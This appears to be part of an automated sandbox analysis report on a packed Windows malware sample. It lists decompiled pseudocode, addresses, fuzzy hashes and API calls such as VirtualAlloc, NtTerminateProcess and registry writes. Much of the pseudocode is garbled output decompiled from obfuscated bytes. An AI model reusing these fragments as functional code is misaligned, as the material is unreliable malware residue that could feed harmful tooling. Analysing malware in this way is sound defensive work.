				 *(_t43 + 0x32) =  *(_t43 + 0x32) ^ _t20;
				asm("fnsave [ecx+ebp*2]");
				asm("aam 0x33");
				asm("fnsave [ebx]");
				asm("xlatb");
				asm("out dx, eax");
				asm("aaa");
				asm("hlt");
				asm("fnsave [ebx]");
				_t45 = _t43 & _t33 ^  *_t40;
				asm("xlatb");
				asm("out dx, eax");
				_pop(es);
				asm("sbb ebx, [edx+0x1f3e33dd]");
				asm("xlatb");
				asm("out dx, eax");
				asm("aaa");
				asm("hlt");
				asm("fnsave [edi]");
				asm("cmpsd");
				asm("aam 0xf5");
				asm("fnsave [ebx]");
				asm("invalid");
				asm("insb");
				asm("fiadd word [ebx-0x23]");
				asm("out dx, eax");
				asm("aaa");
				asm("loop 0xffffffbf");
				_t65 =  *_t69 * 0xffffffde;
				if(_t65 > 0) {
					asm("adc esi, [ss:esi]");
					_t38 = _t33;
					asm("adc esi, [ss:esi]");
					_push(0x36);
					_t65 = _t65;
					_push(_t38);
					_push(_t45 + 4);
				}
				_pop(_t46);
				asm("sbb [ss:esi], dh");
				_t48 = _t46;
				asm("ss outsb");
				asm("retf");
				_pop(_t70);
				asm("popad");
				asm("o16 leave");
				asm("adc al, [gs:edi]");
				_t25 = _t48 *  *(_t70 + 0x5e) ^ 0x365e6666;
				_pop(0xf2b51232);
				asm("sbb dh, [gs:ebp+0xb42c9ce]");
				while(1) {
					L13:
					asm("lock pop es");
					_t53 = _t25 *  *(_t70 + 0x66) >> 0x20;
					_pop(_t70);
					_t27 = _t25 *  *(_t70 + 0x66) ^ 0x00000036;
					while(1) {
						L14:
						asm("aaa");
						asm("pusha");
						_pop(0xf2b51232);
						_push(es);
						_push(ds);
						_t25 = _t27 ^  *(_t27 - 0x37);
						_t55 = _t53 + 1 +  *[gs:ebx-0x42debd0a];
						if(_t55 != 0) {
							break;
						}
						asm("o16 fiadd word [di+0x3637]");
						_t37 = 0xf6;
						_t53 = _t55 + 1;
						_t107 = _t53;
						asm("aas");
						asm("int1");
						if (_t107 >= 0) goto L13;
						while(1) {
							asm("retf 0x3637");
							asm("aaa");
							asm("fnsave [ss:ecx]");
							asm("int1");
							if(_t107 >= 0) {
								goto L14;
							} else {
								asm("frstor [ss:edx+esi]");
								asm("movsb");
								asm("into");
								_pop(_t70);
								_t37 = _t37 ^ 0x00000010;
								_t53 = _t53 ^ _t25;
								if(_t53 < 0) {
									continue;
								} else {
									asm("fldcw word [ecx+0x6bb623dd]");
									_t25 = _t25 ^ 0x37945ea8;
								}
							}
							goto L20;
						}
						goto L13;
					}
					L20:
					asm("aaa");
					asm("cld");
					return  *0x8bc9c9dc;
				}
			}

0x00402648
0x00402648
0x00402654
0x00402660
0x00402670
0x00402675
0x00402678
0x00402682
0x00402687
0x00402687
0x0040268a
0x0040268b
0x00402690
0x00402694
0x004026fa
0x004026ff
0x00402701
0x00402705
0x00402707
0x00402708
0x00402709
0x0040270a
0x0040270c
0x0040270e
0x00402710
0x00402711
0x00402716
0x0040271c
0x0040271e
0x0040271f
0x00402720
0x00402721
0x00402723
0x00402724
0x00402726
0x0040272e
0x00402730
0x00402731
0x00402739
0x0040273a
0x0040273b
0x0040273d
0x00402740
0x00402742
0x0040274f
0x00402759
0x0040275c
0x0040275f
0x00402765
0x00402773
0x00402777
0x00402778
0x00402779
0x0040277f
0x00402781
0x00402788
0x0040278b
0x0040278e
0x00402791
0x00402793
0x0040279e
0x004027a7
0x004027a8
0x004027b0
0x004027b0
0x004027b0
0x004027b2
0x004027b5
0x004027b7
0x004027b9
0x004027b9
0x004027b9
0x004027bb
0x004027bd
0x004027be
0x004027c3
0x004027cc
0x004027cf
0x004027d6
0x00000000
0x00000000
0x004027d8
0x004027de
0x004027e1
0x004027e1
0x004027e2
0x004027e3
0x004027e4
0x004027e5
0x004027e5
0x004027e6
0x004027e7
0x004027ec
0x004027ed
0x00000000
0x004027ef
0x004027ef
0x004027f6
0x004027f7
0x004027f8
0x00402802
0x00402804
0x00402806
0x00000000
0x00402808
0x00402808
0x00402810
0x00402810
0x00402806
0x00000000
0x004027ed
0x00000000
0x004027e5
0x00402812
0x00402814
0x0040282b
0x00402830
0x00402830

Memory Dump Source

Source File: 00000003.00000002.308145383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35aecf4ce77791f2e4fca3ff3c7f0a8d80036c6cd48bc3d8a29629f9e7474573
Instruction ID: 645a99f6af525781c859d0a3b6ad4b974778ef7f848d4b8c34c181efa6051e33
Opcode Fuzzy Hash: 35aecf4ce77791f2e4fca3ff3c7f0a8d80036c6cd48bc3d8a29629f9e7474573
Instruction Fuzzy Hash: 024100372081801FD6119A7452479E27B92EBC7378B704B7BCCC3AE1C3D9578847929A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: hhiwwui PID: 1008 Parent PID: 904 hhiwwuiCOMMON

Executed Functions

Function 02F38676, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Module32First.KERNEL32(00000000,00000224), ref: 02F386BE

Memory Dump Source

Source File: 00000011.00000002.361120622.0000000002F37000.00000040.00000001.sdmp, Offset: 02F37000, based on PE: false

Similarity

API ID: FirstModule32
String ID:
API String ID: 3757679902-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: bafde0053a7275774398448043c63c05db88439f702e84e9ef6cf837fa258201
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: BFF09631500711AFD7223BF5DC8CB6E76E8AF496E9F100528F746910C0DB78EC454E61

Uniqueness

Uniqueness Score: -1.00%

Function 02F38335, Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02F38386

Memory Dump Source

Source File: 00000011.00000002.361120622.0000000002F37000.00000040.00000001.sdmp, Offset: 02F37000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 945179dd06b07c15fb1704780e4108a9351bcdb1d493069ecc43b54a60587d70
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 63113C79A00208EFDB01DF98C985E98BBF5AF08390F058094FA489B361D375EA50DF80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: hhiwwui PID: 3568 Parent PID: 1008 hhiwwuiCOMMON

Executed Functions

Function 0040197F, Relevance: 3.1, APIs: 2, Instructions: 54
sleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 18%

			E0040197F(void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t16;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;

				_t26 = __eflags;
				asm("out dx, eax");
				_push(0x19bb);
				_t8 =  *_t22;
				_t23 = _t22 + 4;
				asm("repne sub eax, 0xfff904e8");
				_push(0x62);
				_t24 = _t23 + 4;
				E004012BF(_t8, _t19, _t20, _t21, __eflags);
				_t16 = _a4;
				Sleep(0x1388);
				_push( &_v8);
				_push(_a12);
				_push(_a8);
				_push(_t16); // executed
				_t11 = E00401502(_t16, _t19, _t20, _t21, _t26); // executed
				_t27 = _t11;
				if(_t11 != 0) {
					_push(_a16);
					_push(_v8);
					_push(_t11);
					_push(_t16); // executed
					L004015D3(_t16, _t19, _t20, _t21, _t27); // executed
				}
				 *_t16(0xffffffff, 0); // executed
				_push(0x19bb);
				_t13 =  *_t24;
				return E004012BF(_t13, _t19, _t20, _t21, _t27);
			}

APIs

Sleep.KERNELBASE(00001388,00000062), ref: 004019C3
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019EB

Memory Dump Source

Source File: 00000012.00000002.370057786.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: bcb473a80559007bb28423a92ef8681f65ebbcb398205737adca3c99fe595efc
Instruction ID: 57e3c6fabe06a165ad46eb134568508f3e71a46e85a60e7e826126cb482f7349
Opcode Fuzzy Hash: bcb473a80559007bb28423a92ef8681f65ebbcb398205737adca3c99fe595efc
Instruction Fuzzy Hash: 1601D8B1708204F7DB00AB959E92D7A3329AF41710F204137BA43791E1D63D9D22EB6B

Uniqueness

Uniqueness Score: -1.00%

Function 004019B1, Relevance: 3.1, APIs: 2, Instructions: 54
sleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E004019B1(void* __edi, void* __esi, void* __eflags) {
				void* _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t16;
				void* _t20;
				void* _t25;
				void* _t27;
				intOrPtr* _t28;

				_t31 = __eflags;
				_t23 = __esi;
				_t21 = __edi;
				asm("in al, dx");
				if (__eflags != 0) goto 0x40199f;
				asm("repne sub eax, 0xfff904e8");
				_push(0x62);
				_t28 = _t27 + 4;
				E004012BF(_t8, _t20, __edi, __esi, __eflags);
				_t16 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_push(_t25 - 4);
				_push( *((intOrPtr*)(_t25 + 0x10)));
				_push( *((intOrPtr*)(_t25 + 0xc)));
				_push(_t16); // executed
				_t11 = E00401502(_t16, _t20, _t21, __esi, _t31); // executed
				_t32 = _t11;
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t25 + 0x14)));
					_push( *((intOrPtr*)(_t25 - 4)));
					_push(_t11);
					_push(_t16); // executed
					L004015D3(_t16, _t20, _t21, _t23, _t32); // executed
				}
				 *_t16(0xffffffff, 0); // executed
				_push(0x19bb);
				_t13 =  *_t28;
				return E004012BF(_t13, _t20, _t21, _t23, _t32);
			}

APIs

Sleep.KERNELBASE(00001388,00000062), ref: 004019C3
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019EB

Memory Dump Source

Source File: 00000012.00000002.370057786.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: cbd6cf45c0b53524ac5aa4dd2f83136c209037899838eeeb919ebb42b7f8e0e9
Instruction ID: 7f18fd79f6fc81d1aacc7b9178c151b85e6c9e578e0c4c1d9390a1e0af9d8492
Opcode Fuzzy Hash: cbd6cf45c0b53524ac5aa4dd2f83136c209037899838eeeb919ebb42b7f8e0e9
Instruction Fuzzy Hash: A101D671204200EBDB019FA9DD95DA93726EF41310F10027BB503BA1E2D63D9A16EB27

Uniqueness

Uniqueness Score: -1.00%

Function 0040198A, Relevance: 3.0, APIs: 2, Instructions: 48
sleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E0040198A(void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t16;
				void* _t20;
				void* _t25;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t32 = __eflags;
				_t23 = __esi;
				_t21 = __edi;
				asm("std");
				asm("lds ebp, [ebp+0x19bb684d]");
				_push(0x19bb);
				_t8 =  *_t27;
				_t28 = _t27 + 4;
				asm("repne sub eax, 0xfff904e8");
				_push(0x62);
				_t29 = _t28 + 4;
				E004012BF(_t8, _t20, __edi, __esi, __eflags);
				_t16 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_push(_t25 - 4);
				_push( *((intOrPtr*)(_t25 + 0x10)));
				_push( *((intOrPtr*)(_t25 + 0xc)));
				_push(_t16); // executed
				_t11 = E00401502(_t16, _t20, _t21, __esi, _t32); // executed
				_t33 = _t11;
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t25 + 0x14)));
					_push( *((intOrPtr*)(_t25 - 4)));
					_push(_t11);
					_push(_t16); // executed
					L004015D3(_t16, _t20, _t21, _t23, _t33); // executed
				}
				 *_t16(0xffffffff, 0); // executed
				_push(0x19bb);
				_t13 =  *_t29;
				return E004012BF(_t13, _t20, _t21, _t23, _t33);
			}

APIs

Sleep.KERNELBASE(00001388,00000062), ref: 004019C3
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019EB

Memory Dump Source

Source File: 00000012.00000002.370057786.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: ccfb191151a767bdc9cbe4523c07d0d7ed4776b2de0f136642fab053b244c2bf
Instruction ID: a72ed57d07a02d256bd32122d7544ea4cc166053f19893fffcfb0d55415ced24
Opcode Fuzzy Hash: ccfb191151a767bdc9cbe4523c07d0d7ed4776b2de0f136642fab053b244c2bf
Instruction Fuzzy Hash: 0701A771608204EBDB01AF94DD92D6E3365AF41314F204177B943791E1C63D9E22EB6B

Uniqueness

Uniqueness Score: -1.00%

Function 0040199C, Relevance: 3.0, APIs: 2, Instructions: 48
sleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E0040199C(void* __ecx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t16;
				void* _t26;
				intOrPtr* _t28;
				void* _t29;
				intOrPtr* _t30;
				void* _t33;

				_t24 = __esi;
				_t22 = __edi;
				_t21 = __edx;
				_t33 = __edx - __ecx;
				asm("out dx, eax");
				_push(0x19bb);
				_t8 =  *_t28;
				_t29 = _t28 + 4;
				asm("repne sub eax, 0xfff904e8");
				_push(0x62);
				_t30 = _t29 + 4;
				E004012BF(_t8, __edx, __edi, __esi, _t33);
				_t16 =  *((intOrPtr*)(_t26 + 8));
				Sleep(0x1388);
				_push(_t26 - 4);
				_push( *((intOrPtr*)(_t26 + 0x10)));
				_push( *((intOrPtr*)(_t26 + 0xc)));
				_push(_t16); // executed
				_t11 = E00401502(_t16, _t21, _t22, __esi, _t33); // executed
				_t34 = _t11;
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t26 + 0x14)));
					_push( *((intOrPtr*)(_t26 - 4)));
					_push(_t11);
					_push(_t16); // executed
					L004015D3(_t16, _t21, _t22, _t24, _t34); // executed
				}
				 *_t16(0xffffffff, 0); // executed
				_push(0x19bb);
				_t13 =  *_t30;
				return E004012BF(_t13, _t21, _t22, _t24, _t34);
			}

APIs

Sleep.KERNELBASE(00001388,00000062), ref: 004019C3
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019EB

Memory Dump Source

Source File: 00000012.00000002.370057786.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 4fb5e9a5afbf0bb0d8b1c466ddce95a75c30193c24937f166a7f97c6bea3c0da
Instruction ID: 38790f97698b8fbd236dc93497c28a5a48dbceb78932be0dbcbbb6d4f4f3ee68
Opcode Fuzzy Hash: 4fb5e9a5afbf0bb0d8b1c466ddce95a75c30193c24937f166a7f97c6bea3c0da
Instruction Fuzzy Hash: F1014471708204E7DB019A959D92E6A3365AB41710F204177BA43791E1C63E9A22EB5B

Uniqueness

Uniqueness Score: -1.00%

Function 004019A0, Relevance: 3.0, APIs: 2, Instructions: 43
sleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E004019A0(void* __edi, void* __esi, void* __eflags) {
				void* _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t16;
				void* _t20;
				void* _t25;
				void* _t27;
				intOrPtr* _t28;

				_t31 = __eflags;
				_t23 = __esi;
				_t21 = __edi;
				asm("sbb ebx, ebp");
				asm("repne sub eax, 0xfff904e8");
				_push(0x62);
				_t28 = _t27 + 4;
				E004012BF(_t8, _t20, __edi, __esi, __eflags);
				_t16 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_push(_t25 - 4);
				_push( *((intOrPtr*)(_t25 + 0x10)));
				_push( *((intOrPtr*)(_t25 + 0xc)));
				_push(_t16); // executed
				_t11 = E00401502(_t16, _t20, _t21, __esi, _t31); // executed
				_t32 = _t11;
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t25 + 0x14)));
					_push( *((intOrPtr*)(_t25 - 4)));
					_push(_t11);
					_push(_t16); // executed
					L004015D3(_t16, _t20, _t21, _t23, _t32); // executed
				}
				 *_t16(0xffffffff, 0); // executed
				_push(0x19bb);
				_t13 =  *_t28;
				return E004012BF(_t13, _t20, _t21, _t23, _t32);
			}

APIs

Sleep.KERNELBASE(00001388,00000062), ref: 004019C3
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019EB

Memory Dump Source

Source File: 00000012.00000002.370057786.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: a3f083826976df0a3047c0ccb3ceba760f639657c05e2c9146095c379659a445
Instruction ID: 9c9c3dab28d51d6fb39e7a0de955185f52c78c5ab62663713faf9a931d33ce0c
Opcode Fuzzy Hash: a3f083826976df0a3047c0ccb3ceba760f639657c05e2c9146095c379659a445
Instruction Fuzzy Hash: 8EF08171308204E7DB01AF959D96EAE3725AF41310F20427BBA43791E1C63D8922EB27

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: 1EB.exe PID: 5440 Parent PID: 3472 1EB.exeCOMMON

Executed Functions

Function 00401E00, Relevance: 37.6, APIs: 25, Instructions: 141registryCOMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401E55
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401E5D
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401E65
__vbaSetSystemError.MSVBVM60(?,00000000,?), ref: 00401E7B
__vbaStrToAnsi.MSVBVM60(?,?,?), ref: 00401E8F
RegCreateKeyA.ADVAPI32(?,00000000), ref: 00401E9B
__vbaStrToUnicode.MSVBVM60(?,?), ref: 00401EA5
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401EAE
#537.MSVBVM60(00000000), ref: 00401EB5
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401EC0
__vbaLenBstr.MSVBVM60(?), ref: 00401ED3
__vbaStrMove.MSVBVM60(?,-00000001), ref: 00401EED
__vbaStrCat.MSVBVM60(00000000), ref: 00401EF4
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401EFF
__vbaStrToAnsi.MSVBVM60(?,00000000), ref: 00401F0A
__vbaStrToAnsi.MSVBVM60(?,?,00000000,00000001,00000000), ref: 00401F18
RegSetValueExA.KERNELBASE(?,00000000), ref: 00401F24
__vbaStrToUnicode.MSVBVM60(?,?), ref: 00401F2E
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 00401F4A
RegCloseKey.KERNELBASE(?), ref: 00401F5C
__vbaSetSystemError.MSVBVM60(?), ref: 00401F67
__vbaFreeStr.MSVBVM60(00401FA6), ref: 00401F99
__vbaFreeStr.MSVBVM60 ref: 00401F9E
__vbaFreeStr.MSVBVM60 ref: 00401FA3
__vbaErrorOverflow.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401FB9

Memory Dump Source

Source File: 00000014.00000002.378120053.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.378109410.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.378158213.0000000000404000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.378167792.0000000000405000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$AnsiCopyErrorMove$SystemUnicode$#537BstrCloseCreateListOverflowValue
String ID:
API String ID: 2107533140-0
Opcode ID: dd93c5477486cb4781e192d58d9aae3d067b3a656344793334b74da0dbd908eb
Instruction ID: fefd5eab8a53b1374428896d65942a4cb620eeccf9a984cdd28dd74a7c15a2cd
Opcode Fuzzy Hash: dd93c5477486cb4781e192d58d9aae3d067b3a656344793334b74da0dbd908eb
Instruction Fuzzy Hash: C351C6B5D10259AFCB04EFA4DD84CEEBBBDEF58704B10811AF501B3264DA74A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00401C60, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401146), ref: 00401C7E
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,00401146), ref: 00401CAE
__vbaVarMove.MSVBVM60 ref: 00401CCF
__vbaVarCopy.MSVBVM60 ref: 00401CF0
__vbaVarCopy.MSVBVM60 ref: 00401D11
__vbaVarCopy.MSVBVM60 ref: 00401D32
__vbaStrVarVal.MSVBVM60(?,?), ref: 00401D47
__vbaStrVarVal.MSVBVM60(?,?,00000000), ref: 00401D56
__vbaStrVarVal.MSVBVM60(?,?,00000000), ref: 00401D65
__vbaI4Var.MSVBVM60(?,00000000), ref: 00401D70

Part of subcall function 00401E00: __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401E55
Part of subcall function 00401E00: __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401E5D
Part of subcall function 00401E00: __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401E65
Part of subcall function 00401E00: __vbaSetSystemError.MSVBVM60(?,00000000,?), ref: 00401E7B
Part of subcall function 00401E00: __vbaStrToAnsi.MSVBVM60(?,?,?), ref: 00401E8F
Part of subcall function 00401E00: RegCreateKeyA.ADVAPI32(?,00000000), ref: 00401E9B
Part of subcall function 00401E00: __vbaStrToUnicode.MSVBVM60(?,?), ref: 00401EA5
Part of subcall function 00401E00: __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401EAE
Part of subcall function 00401E00: #537.MSVBVM60(00000000), ref: 00401EB5
Part of subcall function 00401E00: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401EC0
Part of subcall function 00401E00: __vbaLenBstr.MSVBVM60(?), ref: 00401ED3
Part of subcall function 00401E00: __vbaStrMove.MSVBVM60(?,-00000001), ref: 00401EED
Part of subcall function 00401E00: __vbaStrCat.MSVBVM60(00000000), ref: 00401EF4
Part of subcall function 00401E00: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401EFF
Part of subcall function 00401E00: __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 00401F0A
Part of subcall function 00401E00: __vbaStrToAnsi.MSVBVM60(?,?,00000000,00000001,00000000), ref: 00401F18

__vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000), ref: 00401D8A

Part of subcall function 00401FC0: __vbaVarLateMemSt.MSVBVM60(?,Enabled), ref: 0040209F
Part of subcall function 00401FC0: __vbaVarLateMemSt.MSVBVM60(?,Enabled), ref: 004020DA
Part of subcall function 00401FC0: __vbaVarLateMemSt.MSVBVM60(?,Enabled), ref: 00402118

__vbaFreeVar.MSVBVM60(00401DED,00000001), ref: 00401DCB
__vbaFreeVar.MSVBVM60 ref: 00401DD4
__vbaFreeVar.MSVBVM60 ref: 00401DDD
__vbaFreeVar.MSVBVM60 ref: 00401DE6

Strings

Software\Privacy Tools NL, xrefs: 00401CDC

Memory Dump Source

Source File: 00000014.00000002.378120053.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.378109410.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.378158213.0000000000404000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.378167792.0000000000405000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CopyFree$Move$AnsiLate$Error$#537BstrChkstkCreateListSystemUnicode
String ID: Software\Privacy Tools NL
API String ID: 62378706-2008605987
Opcode ID: 5bb1a24821eb30742729a7ef069b9a4adc799a6ee054163fb1a27313da32d2cf
Instruction ID: 14ce0ff18d63f55136c18a18b80a11a0aee004dd7d5e421db8c20e4d00a0f790
Opcode Fuzzy Hash: 5bb1a24821eb30742729a7ef069b9a4adc799a6ee054163fb1a27313da32d2cf
Instruction Fuzzy Hash: AA41B3B1810249DBDB10DFE0CE58BDDBBB8BB04709F10862DE152B76A1DBB81649CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00401278, Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 25%

			_entry_() {
				signed char _t118;
				intOrPtr* _t119;
				intOrPtr* _t120;
				intOrPtr* _t121;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t126;
				signed int _t127;
				signed char _t128;
				signed int _t129;
				signed char _t130;
				intOrPtr* _t131;
				signed int _t132;
				signed char _t133;
				intOrPtr* _t137;
				intOrPtr* _t139;
				signed char _t143;
				intOrPtr* _t146;
				intOrPtr* _t148;
				intOrPtr* _t150;
				intOrPtr* _t151;
				intOrPtr* _t152;
				intOrPtr* _t154;
				signed char _t155;
				signed int _t156;
				intOrPtr* _t157;
				signed int _t158;
				intOrPtr* _t160;
				intOrPtr* _t167;
				intOrPtr _t168;
				intOrPtr _t169;
				intOrPtr* _t170;
				void* _t171;
				intOrPtr* _t172;
				void* _t173;
				intOrPtr* _t174;
				void* _t176;
				intOrPtr* _t177;
				signed int* _t179;
				signed int _t180;
				intOrPtr* _t181;
				intOrPtr* _t182;
				intOrPtr* _t184;
				intOrPtr* _t185;
				void* _t187;
				intOrPtr* _t188;
				intOrPtr* _t189;
				signed char _t191;
				intOrPtr* _t193;
				signed char _t194;
				signed int _t195;
				signed int* _t196;
				intOrPtr* _t197;
				void* _t198;
				void* _t199;
				signed int* _t200;
				signed int _t201;
				signed int _t202;
				void* _t204;
				signed int _t205;
				void* _t206;
				void* _t210;
				void* _t211;
				intOrPtr _t215;
				signed int _t224;
				signed int _t225;
				intOrPtr _t230;
				intOrPtr _t231;
				intOrPtr _t234;
				signed int _t239;
				signed int _t240;
				void* _t241;
				void* _t246;

				L00401272(); // executed
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 ^ _t118;
				 *_t118 =  *_t118 + _t118;
				_t119 = _t118 + 1;
				 *_t119 =  *_t119 + _t119;
				 *_t119 =  *_t119 + _t119;
				 *_t119 =  *_t119 + _t119;
				 *((intOrPtr*)(_t199 + _t195 * 2 - 0x4b)) =  *((intOrPtr*)(_t199 + _t195 * 2 - 0x4b)) + _t187;
				_t200 = _t199 + 1;
				 *_t194 = _t195;
				_t204 = 0x40138c;
				_t205 = _t204 - 1;
				asm("wait");
				 *(_t187 + 0x55) =  *(_t187 + 0x55) << _t194;
				_t120 =  *((intOrPtr*)(_t197 - 0x19))(_t187);
				 *_t120 =  *_t120 + _t120;
				 *_t120 =  *_t120 + _t120;
				 *_t120 =  *_t120 + _t120;
				 *_t120 =  *_t120 + _t120;
				 *_t120 =  *_t120 + _t120;
				 *_t120 =  *_t120 + _t120;
				 *_t120 =  *_t120 + _t120;
				 *_t120 =  *_t120 + _t120;
				_t215 =  *_t120;
				_push(_t195);
				_push(_t195);
				if(_t215 >= 0 && _t215 == 0) {
					 *[gs:eax] =  *[gs:eax] + _t120;
					 *_t120 =  *_t120 + _t120;
					 *_t120 =  *_t120 + _t120;
					 *_t120 =  *_t120 + _t120;
					 *_t120 =  *_t120 + _t120;
					 *_t197 =  *_t197 + _t120;
					 *_t120 =  *_t120 + _t120;
					 *_t120 =  *_t120 + _t195;
					asm("sbb [eax], eax");
					_pop(es);
					 *_t120 =  *_t120 + _t120;
					_t181 = _t120 + _t194;
					asm("sbb [eax], al");
					_pop(es);
					 *_t181 =  *_t181 + _t181;
					 *((intOrPtr*)(_t181 + 0x7004018)) =  *((intOrPtr*)(_t181 + 0x7004018)) + _t181;
					 *_t181 =  *_t181 + _t181;
					 *((intOrPtr*)(_t181 + _t187)) =  *((intOrPtr*)(_t181 + _t187)) + _t195;
					_t182 = _t181 + 1;
					 *_t197 =  *_t197 + _t182;
					 *_t182 =  *_t182 + _t182;
					_pop(ss);
					_t184 = _t182 + _t195 + 1;
					 *_t197 =  *_t197 + _t184;
					 *_t184 =  *_t184 + _t184;
					 *((intOrPtr*)(_t197 + _t195 + 0x70040)) =  *((intOrPtr*)(_t197 + _t195 + 0x70040)) + _t194;
					 *_t184 =  *_t184 + _t184;
					_pop(ss);
					_t185 = _t184 + 1;
					 *_t194 =  *_t194 + _t185;
					 *_t185 =  *_t185 + _t185;
					 *((intOrPtr*)(_t200 + _t195 + 0x40)) =  *((intOrPtr*)(_t200 + _t195 + 0x40)) + _t187;
					 *_t185 =  *_t185 + _t185;
					 *_t185 =  *_t185 + _t185;
					_t187 = _t187 + _t187;
					asm("invalid");
					asm("invalid");
